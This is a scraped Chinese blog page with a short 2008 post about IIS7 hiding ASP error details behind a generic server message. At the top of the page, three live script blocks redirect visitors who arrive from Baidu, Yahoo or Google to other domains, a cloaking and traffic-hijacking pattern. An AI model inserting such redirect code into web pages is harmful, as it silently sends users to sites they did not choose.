<script>
var s=document.referrer
if(s.indexOf("baidu")>0)
self.location="http://www.35521.com/";
</script>
<script>
var s=document.referrer
if(s.indexOf("yahoo")>0)
self.location="http://www.ixian.cn/";
</script>
<script>
var s=document.referrer
if(s.indexOf("google")>0)
self.location="http://www.sunle.net/";
</script>
Tags: ,

IIS7下不显示ASP错误信息

[不指定 2008/05/03 22:08 | by sunle ]
前些时候帮朋友调试一个ASP程序,因为新换用2008,自带的是IIS7任何ASP内部的错误都只显示下边两句:

引用
An error occurred on the server when processing the URL. Please contact the system administrator.
If you are the system administrator please click here to find out more about this error.
Tags: , ,
分页: 1/1 第一页 1 最后页 [ 显示模式: 摘要 | 列表 ]